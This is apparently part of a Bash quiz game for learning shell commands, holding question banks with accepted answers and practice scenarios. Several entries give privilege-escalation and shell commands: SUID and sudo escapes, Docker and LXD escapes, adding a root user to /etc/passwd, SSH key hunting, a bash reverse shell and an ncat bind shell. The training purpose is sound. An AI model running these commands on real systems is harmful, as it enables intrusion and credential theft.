  questions+=("Find SSH keys|find / -name 'id_rsa*' -o -name 'id_ed25519*' -o -name 'id_ecdsa*' -o -name '*.pem' 2>/dev/null|find / -name 'id_rsa*' -o -name '*.pem' 2>/dev/null|find / -name 'id_rsa' -o -name 'id_ed25519' -o -name 'id_ecdsa' 2>/dev/null|find / -name 'id_rsa*' 2>/dev/null|fd -H -g 'id_rsa*' /|fd --hidden -g 'id_rsa*' /|fd -H 'id_rsa' /|fd --hidden 'id_rsa' /")
  questions+=("SUID find shell escape|find . -exec /bin/sh -p \\; -quit|find . -exec /bin/bash -p \\; -quit|find . -exec /bin/sh -p \\;|find . -exec /bin/bash -p \\;|find . -exec sh -p \\; -quit|find . -exec bash -p \\; -quit|find . -exec sh -p \\;|find . -exec bash -p \\;")
  questions+=("SUID vim shell escape|vim -c ':!/bin/sh -p'|vim -c ':!/bin/bash -p'|vi -c ':!/bin/sh -p'|vi -c ':!/bin/bash -p'|vim -c ':!sh -p'|vim -c ':!bash -p'|vi -c ':!sh -p'|vi -c ':!bash -p'")
  questions+=("SUID python3 shell|python3 -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'|python3 -c 'import os; os.execl(\"/bin/bash\", \"bash\", \"-p\")'|python3 -c 'import pty; pty.spawn(\"/bin/sh\")'|python3 -c 'import pty; pty.spawn(\"/bin/bash\")'|python3 -c 'import os;os.system(\"/bin/sh -p\")'|python3 -c 'import os;os.system(\"/bin/bash -p\")'|python -c 'import pty; pty.spawn(\"/bin/sh\")'|python -c 'import pty; pty.spawn(\"/bin/bash\")'")
  questions+=("Sudo env privesc|sudo env /bin/sh|sudo env /bin/bash|sudo env sh|sudo env bash|sudo /usr/bin/env /bin/sh|sudo /usr/bin/env /bin/bash")
  questions+=("Check kernel exploits (searchsploit)|searchsploit linux kernel \$(uname -r)|searchsploit kernel \$(uname -r)|searchsploit linux \$(uname -r)")
  questions+=("Docker socket check|ls -la /var/run/docker.sock|ls -l /var/run/docker.sock")
  questions+=("Docker escape via socket|docker run -v /:/mnt --rm -it alpine chroot /mnt sh|docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/bash|docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh|docker run -v /:/mnt --rm -it alpine chroot /mnt bash|sudo docker run -v /:/mnt --rm -it alpine chroot /mnt sh|sudo docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/bash|sudo docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh|sudo docker run -v /:/mnt --rm -it alpine chroot /mnt bash")
  questions+=("LXD privesc: init privileged ubuntu:22.04 container named 'privesc'|lxc init ubuntu:22.04 privesc -c security.privileged=true|lxc init ubuntu:22.04 privesc --config security.privileged=true|lxc init ubuntu:22.04 privesc --config=security.privileged=true|sudo lxc init ubuntu:22.04 privesc -c security.privileged=true|sudo lxc init ubuntu:22.04 privesc --config security.privileged=true")
  questions+=("Check ${W}/etc/passwd${C} writable|ls -la /etc/passwd|ls -l /etc/passwd|stat /etc/passwd")
  questions+=("Find all world-writable files|find / -writable -type f 2>/dev/null|find / -perm -o+w -type f 2>/dev/null|find / -perm -0002 -type f 2>/dev/null|find / -type f -writable 2>/dev/null|find / -type f -perm -o+w 2>/dev/null|find / -type f -perm -0002 2>/dev/null")
  questions+=("Privesc: add root user to ${W}/etc/passwd${C} (when writable)|echo \"hacker:\$(openssl passwd -6 pass):0:0::/root:/bin/bash\" >> /etc/passwd|echo \"hacker:\$(openssl passwd -6 pass):0:0::/root:/bin/sh\" >> /etc/passwd|echo \"hacker:\$(openssl passwd -1 pass):0:0::/root:/bin/bash\" >> /etc/passwd|echo \"hacker:\$(openssl passwd -1 pass):0:0::/root:/bin/sh\" >> /etc/passwd")
  questions+=("Find writable scripts in cron§grep -v '^#' /etc/crontab | awk '{print \$NF}' | xargs ls -la 2>/dev/null§cat /etc/crontab | awk '{print \$NF}' | xargs ls -la 2>/dev/null")
  questions+=("Check current PATH|echo \$PATH|echo \${PATH}|printenv PATH")
  questions+=("Prepend current dir to PATH|export PATH=.:\$PATH|PATH=.:\$PATH")
  questions+=("Create malicious binary|echo '#!/bin/bash' > /tmp/ls && echo '/bin/bash -p' >> /tmp/ls && chmod +x /tmp/ls|echo '#!/bin/bash' > /tmp/ls; echo '/bin/bash -p' >> /tmp/ls; chmod +x /tmp/ls")
  questions+=("Exploit relative path in SUID|export PATH=/tmp:\$PATH && ./vulnerable_suid|export PATH=/tmp:\$PATH; ./vulnerable_suid")
  questions+=("Check NFS exports|showmount -e ${ip}|cat /etc/exports")
  questions+=("Mount NFS export ${ip}:/share at /mnt|mount -t nfs ${ip}:/share /mnt|sudo mount -t nfs ${ip}:/share /mnt|mount ${ip}:/share /mnt|mount -t nfs ${ip}:/share /mnt/|sudo mount -t nfs ${ip}:/share /mnt/|mount ${ip}:/share /mnt/|sudo mount ${ip}:/share /mnt|sudo mount ${ip}:/share /mnt/")
  questions+=("Create SUID on NFS|cp /bin/bash /mnt && chmod +s /mnt/bash|cp /bin/bash /mnt && chmod u+s /mnt/bash|cp /bin/bash /mnt; chmod +s /mnt/bash|cp /bin/bash /mnt; chmod u+s /mnt/bash|cp /bin/bash /mnt && chmod 4755 /mnt/bash|cp /bin/bash /mnt; chmod 4755 /mnt/bash|cp /bin/sh /mnt && chmod +s /mnt/sh|cp /bin/sh /mnt; chmod +s /mnt/sh|cp /bin/sh /mnt && chmod u+s /mnt/sh|cp /bin/sh /mnt; chmod u+s /mnt/sh|cp /bin/sh /mnt && chmod 4755 /mnt/sh|cp /bin/sh /mnt; chmod 4755 /mnt/sh")
}

# Level 30: ROOT
gen_level30() {
  local -n questions=${1:-CURRENT_QUESTIONS}; questions=(); eval "local $_QV"; _ctx
  questions+=("Remount root filesystem read-write|mount -o remount,rw /|mount -o rw,remount /|sudo mount -o remount,rw /|sudo mount -o rw,remount /|mount / -o remount,rw|sudo mount / -o remount,rw")
  questions+=("Emergency single-user mode|init 1|systemctl rescue|telinit 1|systemctl isolate rescue.target|telinit s|telinit S|init s|init S|sudo systemctl rescue|sudo init 1|sudo telinit 1|sudo telinit s|sudo telinit S|sudo init s|sudo init S")
  questions+=("Chroot into system mounted at /mnt|chroot /mnt /bin/bash|chroot /mnt /bin/sh|chroot /mnt|arch-chroot /mnt|chroot /mnt bash|chroot /mnt sh|sudo chroot /mnt /bin/bash|sudo chroot /mnt /bin/sh|sudo chroot /mnt|sudo arch-chroot /mnt|sudo chroot /mnt bash|sudo chroot /mnt sh|arch-chroot /mnt bash|arch-chroot /mnt /bin/bash|sudo arch-chroot /mnt bash|sudo arch-chroot /mnt /bin/bash")
  questions+=("Regenerate initramfs (Arch)|mkinitcpio -P|mkinitcpio --allpresets|sudo mkinitcpio -P|sudo mkinitcpio --allpresets")
  questions+=("Regenerate GRUB config|grub-mkconfig -o /boot/grub/grub.cfg|grub2-mkconfig -o /boot/grub2/grub.cfg|update-grub|sudo grub-mkconfig -o /boot/grub/grub.cfg|sudo grub2-mkconfig -o /boot/grub2/grub.cfg|sudo update-grub")
  questions+=("Fix broken sudo (as root)|chown root:root /usr/bin/sudo; chmod 4755 /usr/bin/sudo|chown root:root /usr/bin/sudo && chmod 4755 /usr/bin/sudo|chown root:root /usr/bin/sudo && chmod u+s /usr/bin/sudo|chown root:root /usr/bin/sudo; chmod u+s /usr/bin/sudo|chmod 4755 /usr/bin/sudo; chown root:root /usr/bin/sudo|chmod 4755 /usr/bin/sudo && chown root:root /usr/bin/sudo")
  questions+=("Reset root password from recovery|passwd root|passwd")
  questions+=("Reinstall bootloader to MBR|grub-install /dev/sda|grub2-install /dev/sda|sudo grub-install /dev/sda|sudo grub2-install /dev/sda")
  questions+=("Check and repair filesystem|fsck -y /dev/sda1|sudo fsck -y /dev/sda1|e2fsck -y /dev/sda1|sudo e2fsck -y /dev/sda1|fsck -p /dev/sda1|sudo fsck -p /dev/sda1|e2fsck -p /dev/sda1|sudo e2fsck -p /dev/sda1|fsck /dev/sda1|sudo fsck /dev/sda1")
  questions+=("Mount LUKS encrypted partition|cryptsetup open /dev/sda2 cryptroot && mount /dev/mapper/cryptroot /mnt|cryptsetup luksOpen /dev/sda2 cryptroot && mount /dev/mapper/cryptroot /mnt|cryptsetup open /dev/sda2 cryptroot; mount /dev/mapper/cryptroot /mnt|cryptsetup luksOpen /dev/sda2 cryptroot; mount /dev/mapper/cryptroot /mnt|sudo cryptsetup open /dev/sda2 cryptroot && mount /dev/mapper/cryptroot /mnt|sudo cryptsetup luksOpen /dev/sda2 cryptroot && mount /dev/mapper/cryptroot /mnt|sudo cryptsetup open /dev/sda2 cryptroot; mount /dev/mapper/cryptroot /mnt|sudo cryptsetup luksOpen /dev/sda2 cryptroot; mount /dev/mapper/cryptroot /mnt")
  questions+=("Find and kill process using port ${port}§kill \$(lsof -t -i:${port})§fuser -k ${port}/tcp§lsof -ti:${port} | xargs kill§kill \$(lsof -ti:${port})§sudo kill \$(lsof -t -i:${port})§sudo fuser -k ${port}/tcp§fuser -k -n tcp ${port}§sudo fuser -k -n tcp ${port}§kill \$(lsof -t -i :${port})§lsof -ti :${port} | xargs kill§kill \$(lsof -ti :${port})§sudo kill \$(lsof -t -i :${port})")
  questions+=("Find large files (>100M) modified in 24h|find / -type f -size +100M -mtime -1 2>/dev/null|find / -size +100M -type f -mtime -1 2>/dev/null|find / -type f -mtime -1 -size +100M 2>/dev/null|find / -size +100M -mtime -1 -type f 2>/dev/null|find / -mtime -1 -type f -size +100M 2>/dev/null|find / -mtime -1 -size +100M -type f 2>/dev/null|fd -S +100M --changed-within 1d /|fd --size +100M --changed-within 1d /|fd -S +100M --changed-within 24h /")
  questions+=("Watch for new connections in realtime|watch -n1 'ss -tn state established'|watch -n 1 'ss -tn state established'|watch -n1 'ss -tnp state established'|watch -n 1 'ss -tnp state established'")
  questions+=("Monitor file changes in directory|inotifywait -m -r ${dir}/|inotifywait -m -r ${dir}|inotifywait -mr ${dir}/|inotifywait -mr ${dir}|inotifywait --monitor --recursive ${dir}/|inotifywait --monitor --recursive ${dir}|inotifywait --monitor -r ${dir}/|inotifywait -m --recursive ${dir}/|inotifywait --monitor -r ${dir}|inotifywait -m --recursive ${dir}")
  questions+=("Parallel compress all logs§find /var/log -name '*.log' | parallel gzip§find /var/log -name '*.log' | xargs gzip§find /var/log -name '*.log' -exec gzip {} +§find /var/log -name '*.log' -exec gzip {} \\;§sudo find /var/log -name '*.log' | parallel gzip§sudo find /var/log -name '*.log' | xargs gzip§sudo find /var/log -name '*.log' -exec gzip {} +§sudo find /var/log -name '*.log' -exec gzip {} \\;")
  questions+=("Find duplicate files by hash§find . -type f -exec md5sum {} + | sort | uniq -d -w32§find . -type f -exec md5sum {} \; | sort | uniq -d -w32§find . -type f -exec sha256sum {} + | sort | uniq -d -w64")
  questions+=("Extract all IPs from logs, count, sort§grep -rohE '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' /var/log/* | sort | uniq -c | sort -rn | head§grep -roE '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' /var/log/* | sort | uniq -c | sort -rn | head§egrep -roh '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' /var/log/* | sort | uniq -c | sort -rn | head§egrep -ro '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' /var/log/* | sort | uniq -c | sort -rn | head§sudo grep -rohE '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' /var/log/* | sort | uniq -c | sort -rn | head§sudo grep -roE '[0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+' /var/log/* | sort | uniq -c | sort -rn | head")
  questions+=("Emergency disk space cleanup|find /var/log -name '*.gz' -mtime +7 -delete|find /var/log -name '*.gz' -mtime +7 -exec rm {} +|find /var/log -name '*.gz' -mtime +7 -exec rm {} \;")
  questions+=("Find recently modified system files|find /etc -mmin -60 -type f 2>/dev/null|find /etc -type f -mmin -60 2>/dev/null")
  questions+=("From ${W}ss -tlpn${C} output, print local address (col 4) and process (col 6)§ss -tlpn | awk 'NR>1 {print \$4, \$6}'§ss -tlpn | awk 'NR>1{print \$4,\$6}'§ss -tlpn | tail -n +2 | awk '{print \$4, \$6}'§ss -tlpn | tail -n +2 | awk '{print \$4,\$6}'")
  questions+=("Simple HTTP server (Python)|python3 -m http.server ${port}|python -m http.server ${port}")
  questions+=("Reverse shell (bash)|bash -i >& /dev/tcp/${ip}/${port} 0>&1|/bin/bash -i >& /dev/tcp/${ip}/${port} 0>&1")
  questions+=("Create SSH tunnel and background|ssh -fNT -L ${port}:localhost:${port} ${user}@${host}|ssh -fN -L ${port}:localhost:${port} ${user}@${host}|ssh -fNTL ${port}:localhost:${port} ${user}@${host}|ssh -fNL ${port}:localhost:${port} ${user}@${host}|ssh -L ${port}:localhost:${port} -fNT ${user}@${host}|ssh -L ${port}:localhost:${port} -fN ${user}@${host}")
  questions+=("Test if ${W}${ip}${C} is up via port 22 (no ping)|timeout 1 bash -c \"echo >/dev/tcp/${ip}/22\" && echo up|nc -zw1 ${ip} 22|nc -z -w 1 ${ip} 22|nc -zw 1 ${ip} 22")
  questions+=("Bind shell with ncat|ncat -lvnp ${port} -e /bin/bash|ncat -nlvp ${port} -e /bin/bash|ncat -lvnp ${port} -e /bin/sh|ncat -nlvp ${port} -e /bin/sh|ncat -lvnp ${port} -e bash|ncat -nlvp ${port} -e bash|ncat -lvnp ${port} -e sh|ncat -nlvp ${port} -e sh|nc -lvnp ${port} -e /bin/bash|nc -nlvp ${port} -e /bin/bash|nc -lvnp ${port} -e /bin/sh|nc -nlvp ${port} -e /bin/sh")
  questions+=("Encrypted listener (openssl) on port ${W}${port}${C}|openssl s_server -quiet -key key.pem -cert cert.pem -port ${port}|openssl s_server -quiet -cert cert.pem -key key.pem -port ${port}|openssl s_server -key key.pem -cert cert.pem -quiet -port ${port}|openssl s_server -cert cert.pem -key key.pem -quiet -port ${port}|openssl s_server -key key.pem -cert cert.pem -port ${port} -quiet|openssl s_server -cert cert.pem -key key.pem -port ${port} -quiet|openssl s_server -quiet -key key.pem -cert cert.pem -accept ${port}|openssl s_server -quiet -cert cert.pem -key key.pem -accept ${port}")
  questions+=("Pivot through host (proxychains setup)§ssh -D 9050 ${user}@${host} -fN && proxychains nmap ${ip}§ssh -D 9050 ${user}@${host} -fN; proxychains nmap ${ip}§ssh -D 9050 ${user}@${host} -fN && proxychains4 nmap ${ip}§ssh -D 9050 ${user}@${host} -fN; proxychains4 nmap ${ip}")
  questions+=("List all cron jobs system-wide|crontab -l; cat /etc/crontab; ls /etc/cron.d/|crontab -l && cat /etc/crontab && ls /etc/cron.d/|crontab -l; cat /etc/crontab; ls /etc/cron.d|crontab -l && cat /etc/crontab && ls /etc/cron.d")
  questions+=("Find files owned by nobody/nogroup|find / -nouser -o -nogroup 2>/dev/null|find / -nouser -or -nogroup 2>/dev/null")
  questions+=("List all users with shell access§grep -vE 'nologin|false' /etc/passwd§grep -v -E 'nologin|false' /etc/passwd§egrep -v 'nologin|false' /etc/passwd§grep --invert-match -E 'nologin|false' /etc/passwd§rg -v 'nologin|false' /etc/passwd§rg --invert-match 'nologin|false' /etc/passwd")
  questions+=("Show failed login attempts§journalctl _COMM=sshd | grep -iE 'failed|invalid'§grep 'Failed' /var/log/auth.log§journalctl -u sshd | grep -iE 'failed|invalid'§journalctl -u ssh | grep -iE 'failed|invalid'§journalctl _COMM=sshd | egrep -i 'failed|invalid'§journalctl -u sshd | egrep -i 'failed|invalid'§journalctl -u ssh | egrep -i 'failed|invalid'§lastb§sudo lastb§grep Failed /var/log/auth.log§grep -i failed /var/log/auth.log§journalctl _COMM=sshd | rg -i 'failed|invalid'§journalctl -u sshd | rg -i 'failed|invalid'§rg -i 'failed|invalid' /var/log/auth.log§rg -i failed /var/log/auth.log")
  questions+=("Find hidden files in home dirs|find /home -name '.*' -type f 2>/dev/null|find /home -type f -name '.*' 2>/dev/null")
  questions+=("Check for rootkits|chkrootkit|rkhunter --check|rkhunter -c|sudo chkrootkit|sudo rkhunter --check|sudo rkhunter -c")
  questions+=("Dump all environment variables§env; cat /proc/*/environ 2>/dev/null | tr '\\0' '\\n'§env§printenv§set§export§export -p")
  questions+=("Trace system calls of ${W}${proc}${C}|strace -p \$(pgrep -f ${proc})|strace -fp \$(pgrep -f ${proc})|sudo strace -p \$(pgrep -f ${proc})|sudo strace -fp \$(pgrep -f ${proc})|strace -p \$(pidof ${proc})|strace -fp \$(pidof ${proc})|sudo strace -p \$(pidof ${proc})|sudo strace -fp \$(pidof ${proc})|strace -p \$(pgrep ${proc})|sudo strace -p \$(pgrep ${proc})")
  questions+=("Find processes with deleted binaries§ls -la /proc/*/exe 2>/dev/null | grep deleted§ls -l /proc/*/exe 2>/dev/null | grep deleted§ls -la /proc/*/exe 2>/dev/null | rg deleted§ls -l /proc/*/exe 2>/dev/null | rg deleted")
  questions+=("Memory dump of ${W}${proc}${C}|gcore -o dump \$(pgrep -f ${proc})|sudo gcore -o dump \$(pgrep -f ${proc})|gcore -o dump \$(pidof ${proc})|sudo gcore -o dump \$(pidof ${proc})")
  questions+=("Block IP with iptables|iptables -A INPUT -s ${ip} -j DROP|iptables -I INPUT -s ${ip} -j DROP|sudo iptables -A INPUT -s ${ip} -j DROP|sudo iptables -I INPUT -s ${ip} -j DROP")
  questions+=("Block IP with nftables|nft add rule inet filter input ip saddr ${ip} drop|sudo nft add rule inet filter input ip saddr ${ip} drop")
  questions+=("Rate limit SSH connections|iptables -A INPUT -p tcp --dport 22 -m connlimit --connlimit-above 3 -j DROP|sudo iptables -A INPUT -p tcp --dport 22 -m connlimit --connlimit-above 3 -j DROP")
  questions+=("Enable SYN cookies|echo 1 > /proc/sys/net/ipv4/tcp_syncookies|sysctl -w net.ipv4.tcp_syncookies=1|sysctl net.ipv4.tcp_syncookies=1|sudo sysctl -w net.ipv4.tcp_syncookies=1|sudo sysctl net.ipv4.tcp_syncookies=1")
  questions+=("Disable IP forwarding|echo 0 > /proc/sys/net/ipv4/ip_forward|sysctl -w net.ipv4.ip_forward=0|sysctl net.ipv4.ip_forward=0|sudo sysctl -w net.ipv4.ip_forward=0|sudo sysctl net.ipv4.ip_forward=0")
  questions+=("Flush all firewall rules|iptables -F; iptables -X|iptables -F && iptables -X|sudo iptables -F; sudo iptables -X|sudo iptables -F && sudo iptables -X")
  questions+=("List all iptables rules|iptables -L -n -v|iptables -S|iptables --list -n -v|sudo iptables -L -n -v|sudo iptables -S|sudo iptables --list -n -v")
  questions+=("List all nftables rules|nft list ruleset|sudo nft list ruleset")
  questions+=("Audit failed sudo attempts|grep 'FAILED' /var/log/auth.log|grep -i 'failed' /var/log/auth.log|sudo grep 'FAILED' /var/log/auth.log|sudo grep -i 'failed' /var/log/auth.log|journalctl -u sudo|journalctl _COMM=sudo|sudo journalctl -u sudo|sudo journalctl _COMM=sudo")
  questions+=("Lock user account§passwd -l ${user}§passwd --lock ${user}§usermod -L ${user}§usermod --lock ${user}§sudo passwd -l ${user}§sudo passwd --lock ${user}§sudo usermod -L ${user}§sudo usermod --lock ${user}")
  questions+=("Watch memory hogs in realtime§watch -n1 'ps aux --sort=-%mem | head -5'§watch -n1 'ps aux --sort=-%mem | head -10'§watch -n1 'ps aux --sort=-%mem | head'§watch 'ps aux --sort=-%mem | head'")
  questions+=("Find process using open file ${W}${txt}${C}§lsof ${txt}§fuser ${txt}")
  questions+=("Kill all ${W}${proc}${C} processes|pkill -9 -f ${proc}|pkill -9 ${proc}|pkill -f ${proc}|pkill ${proc}|killall -9 ${proc}|killall ${proc}|sudo pkill -9 -f ${proc}|sudo pkill -9 ${proc}|sudo pkill -f ${proc}|sudo pkill ${proc}|sudo killall -9 ${proc}|sudo killall ${proc}")
  questions+=("Lower priority of ${W}${proc}${C}|renice -n 10 -p \$(pgrep -f ${proc})|renice 10 -p \$(pgrep -f ${proc})|renice +10 -p \$(pgrep -f ${proc})|renice -n 10 \$(pgrep -f ${proc})|renice 10 \$(pgrep -f ${proc})|renice +10 \$(pgrep -f ${proc})|sudo renice -n 10 -p \$(pgrep -f ${proc})|sudo renice 10 -p \$(pgrep -f ${proc})|sudo renice +10 -p \$(pgrep -f ${proc})")
  questions+=("Find disk usage hogs§du -xh / 2>/dev/null | sort -rh | head -20§du -xh / 2>/dev/null | sort -rh | head§du -xh / | sort -rh | head -20§du -xh / | sort -rh | head§du -xh / 2>/dev/null | sort -rh | head -10§du -xh / | sort -rh | head -10")
  questions+=("Clear systemd journal logs|journalctl --vacuum-size=100M|journalctl --vacuum-size 100M|sudo journalctl --vacuum-size=100M|sudo journalctl --vacuum-size 100M")
  questions+=("Sync and drop caches|sync; echo 3 > /proc/sys/vm/drop_caches|sync && echo 3 > /proc/sys/vm/drop_caches|sync; sysctl -w vm.drop_caches=3|sync && sysctl -w vm.drop_caches=3")
  questions+=("Check disk health (SMART)|smartctl -a /dev/sda|smartctl --all /dev/sda|sudo smartctl -a /dev/sda|sudo smartctl --all /dev/sda|smartctl -H /dev/sda|sudo smartctl -H /dev/sda")
  questions+=("Shred ${W}${txt}${C}: 3 passes, verbose, force, zero-fill after|shred -vfz -n 3 ${txt}|shred -n 3 -vfz ${txt}|shred --verbose --force --zero -n 3 ${txt}|shred --verbose --force --zero --iterations=3 ${txt}|shred --verbose --force --zero --iterations 3 ${txt}")
  questions+=("Create 512M RAM disk (tmpfs) at /mnt/ramdisk|mount -t tmpfs -o size=512M tmpfs /mnt/ramdisk|sudo mount -t tmpfs -o size=512M tmpfs /mnt/ramdisk")
  questions+=("Clone disk with progress|dd if=/dev/sda of=/dev/sdb bs=64K status=progress conv=noerror,sync|dd bs=64K if=/dev/sda of=/dev/sdb status=progress conv=noerror,sync|dd if=/dev/sda bs=64K of=/dev/sdb status=progress conv=noerror,sync|sudo dd if=/dev/sda of=/dev/sdb bs=64K status=progress conv=noerror,sync|sudo dd bs=64K if=/dev/sda of=/dev/sdb status=progress conv=noerror,sync|sudo dd if=/dev/sda bs=64K of=/dev/sdb status=progress conv=noerror,sync|dd if=/dev/sda of=/dev/sdb bs=64K status=progress conv=sync,noerror|dd bs=64K if=/dev/sda of=/dev/sdb status=progress conv=sync,noerror|dd if=/dev/sda bs=64K of=/dev/sdb status=progress conv=sync,noerror|sudo dd if=/dev/sda of=/dev/sdb bs=64K status=progress conv=sync,noerror|sudo dd bs=64K if=/dev/sda of=/dev/sdb status=progress conv=sync,noerror|sudo dd if=/dev/sda bs=64K of=/dev/sdb status=progress conv=sync,noerror")
  questions+=("Random string generator§tr -dc 'a-zA-Z0-9' < /dev/urandom | head -c 32§cat /dev/urandom | tr -dc 'a-zA-Z0-9' | head -c 32§openssl rand -hex 16§openssl rand -base64 24")
  questions+=("Timestamp in epoch|date +%s|date '+%s'|printf '%(%s)T\\n'|printf '%(%s)T\\n' -1")
  questions+=("Convert epoch ${W}1234567890${C} to date|date -d @1234567890|date -d@1234567890|date --date=@1234567890|date --date @1234567890|printf '%(%Y-%m-%d)T\\n' 1234567890")
  questions+=("Parallel execution with xargs§cat urls.txt | xargs -P 10 -I{} curl -s {}§cat urls.txt | xargs -P 10 -I {} curl -s {}§xargs -P 10 -I{} curl -s {} < urls.txt§xargs -P 10 -I {} curl -s {} < urls.txt")
  questions+=("Timeout a command|timeout 5 long_running_cmd|timeout 5s long_running_cmd")
  questions+=("Retry command until success|until cmd; do sleep 1; done|while ! cmd; do sleep 1; done")
  questions+=("Use flock on fd 200 (/tmp/lock) to prevent concurrent script runs§exec 200>/tmp/lock; flock -n 200 || exit 1§exec 200>/tmp/lock && flock -n 200 || exit 1")
  questions+=("Create a named pipe (FIFO) at ${W}/tmp/pipe${C} and use it|mkfifo /tmp/pipe; cmd1 > /tmp/pipe & cmd2 < /tmp/pipe|mkfifo /tmp/pipe && cmd1 > /tmp/pipe & cmd2 < /tmp/pipe")
  questions+=("Create bootable USB|dd if=arch.iso of=/dev/sdb bs=4M status=progress oflag=sync|dd bs=4M if=arch.iso of=/dev/sdb status=progress oflag=sync|dd if=arch.iso bs=4M of=/dev/sdb status=progress oflag=sync|sudo dd if=arch.iso of=/dev/sdb bs=4M status=progress oflag=sync|sudo dd bs=4M if=arch.iso of=/dev/sdb status=progress oflag=sync|sudo dd if=arch.iso bs=4M of=/dev/sdb status=progress oflag=sync|dd if=arch.iso of=/dev/sdb bs=4M status=progress conv=fsync|sudo dd if=arch.iso of=/dev/sdb bs=4M status=progress conv=fsync")
  questions+=("Generate SSH key (no network needed)|ssh-keygen -t ed25519 -f ~/.ssh/offline_key|ssh-keygen -f ~/.ssh/offline_key -t ed25519|ssh-keygen -t ed25519|ssh-keygen|ssh-keygen -t rsa|ssh-keygen -t rsa -b 4096")
  questions+=("Encrypt ${W}${txt}${C} for offline transport|gpg -c --cipher-algo AES256 ${txt}|gpg --symmetric --cipher-algo AES256 ${txt}|gpg -c ${txt}|gpg --symmetric ${txt}|gpg2 -c --cipher-algo AES256 ${txt}|gpg2 --symmetric --cipher-algo AES256 ${txt}|gpg2 -c ${txt}|gpg2 --symmetric ${txt}")
}

# ═══ SCENARIOS ═══
_sc_is_done() { [[ ",$SC_DONE," == *",$1,"* ]]; }
_sc_mark_done() {
  _sc_is_done "$1" && return
  [[ -n "$SC_DONE" ]] && SC_DONE="$SC_DONE,$1" || SC_DONE="$1"
  _save_profile
}

# --- Scenario 1: Permission Lockout ---
_sc_setup_1() {
  local d=$1
  chmod 000 "$d/config.ini"
  chmod 644 "$d/backup.sh"
  mkdir -p "$d/logs"
  chmod 000 "$d/logs"
}
_sc_steps_1() {
  cat <<'STEPS'
List permissions to see what's broken§ls -l§ls -la§ls -al§ls -lh§ls -lah§ls -lA§ls --long§stat config.ini backup.sh logs#output:~----------
Make config.ini readable§chmod 644 config.ini§chmod a+r config.ini§chmod u+r config.ini§chmod +r config.ini§chmod 444 config.ini§chmod 664 config.ini§chmod 600 config.ini§chmod 400 config.ini§chmod 440 config.ini§chmod 0644 config.ini§chmod 0600 config.ini§chmod 0444 config.ini§chmod 0400 config.ini§chmod ugo+r config.ini#state:perm:config.ini:r
Verify config.ini is readable now§cat config.ini§less config.ini§more config.ini§head config.ini§head -n 10 config.ini§tail config.ini#output:~\[server\]
Make backup.sh executable§chmod +x backup.sh§chmod 755 backup.sh§chmod u+x backup.sh§chmod a+x backup.sh§chmod 0755 backup.sh§chmod 775 backup.sh§chmod 0775 backup.sh§chmod ugo+x backup.sh#state:perm:backup.sh:x
Make logs/ directory accessible§chmod 755 logs§chmod +rx logs§chmod a+rx logs§chmod u+rx logs§chmod 700 logs§chmod 770 logs§chmod 750 logs§chmod 0755 logs§chmod 0700 logs§chmod 0770 logs§chmod 0750 logs§chmod u+rwx logs§chmod ugo+rx logs§chmod 755 logs/§chmod +rx logs/§chmod a+rx logs/#state:perm:logs:rx
Run backup.sh to verify it works§./backup.sh§bash backup.sh§sh backup.sh§source backup.sh§. backup.sh§. ./backup.sh§source ./backup.sh#output:~Backup complete
STEPS
}

# --- Scenario 2: Archive & Extract ---
_sc_setup_2() {
  local d=$1
  mkdir -p "$d/release"
  printf '2.0\n' > "$d/release/VERSION"
  printf '# Release Notes\nNew features.\n' > "$d/release/README.md"
  printf 'print("hello")\n' > "$d/release/app.py"
}
_sc_steps_2() {
  cat <<'STEPS'
Create a tar.gz of the release/ directory§tar czf release.tar.gz release§tar -czf release.tar.gz release§tar czf release.tar.gz release/§tar -czf release.tar.gz release/§tar cvzf release.tar.gz release§tar -cvzf release.tar.gz release§tar cvzf release.tar.gz release/§tar -cvzf release.tar.gz release/#state:exists:release.tar.gz
List the archive contents§tar tzf release.tar.gz§tar -tzf release.tar.gz§tar tf release.tar.gz§tar -tf release.tar.gz§tar tzvf release.tar.gz§tar -tzvf release.tar.gz§tar tvf release.tar.gz§tar -tvf release.tar.gz#output:~release/
Delete the original release/ directory§rm -rf release§rm -r release§rm -rf release/§rm -r release/§rm -Rf release§rm -Rf release/§rm --recursive release§rm --recursive --force release§rm --recursive release/§rm --recursive --force release/#state:!exists:release
Extract the archive to restore it§tar xzf release.tar.gz§tar -xzf release.tar.gz§tar xf release.tar.gz§tar -xf release.tar.gz§tar xzvf release.tar.gz§tar -xzvf release.tar.gz§tar xvf release.tar.gz§tar -xvf release.tar.gz#state:exists:release/VERSION
Verify VERSION was restored§cat release/VERSION§less release/VERSION§more release/VERSION§head release/VERSION§head -n 1 release/VERSION#output:~2\.0
Count files in restored release/§ls release | wc -l§ls release/ | wc -l§ls -1 release | wc -l§ls -1 release/ | wc -l§ls release | wc --lines§ls release/ | wc --lines§ls -1 release | wc --lines§ls -1 release/ | wc --lines#output:3
STEPS
}

# --- Scenario 3: Find the Needle ---
_sc_setup_3() {
  local d=$1
  printf 'Meeting Notes\n=============\nNo action items.\n' > "$d/notes.txt"
  mkdir -p "$d/src/lib"
  cat > "$d/main.py" <<'PY'
#!/usr/bin/env python3
"""Main application module."""

def main():
    pass  # TODO: implement main logic

if __name__ == "__main__":
    main()
PY
  printf '# FIXME: broken on edge case\ndef helper(x):\n    return x * 2\n' > "$d/src/lib/helpers.py"
  printf '# HACK: temporary workaround\necho "ok"\n' >> "$d/deploy.sh"
  printf '# TODO: add error handling\n' >> "$d/backup.sh"
}
_sc_steps_3() {
  cat <<'STEPS'
Find files containing TODO§grep -rl TODO .§grep -rl TODO§grep -Rl TODO .§grep -Rl TODO§grep --recursive -l TODO .§grep --recursive -l TODO§grep -rli TODO .§grep -Rli TODO .§grep -rli TODO§grep -Rli TODO§grep -rwl TODO .§grep -Rwl TODO .§grep -rwl TODO§grep -Rwl TODO#output:~main\.py
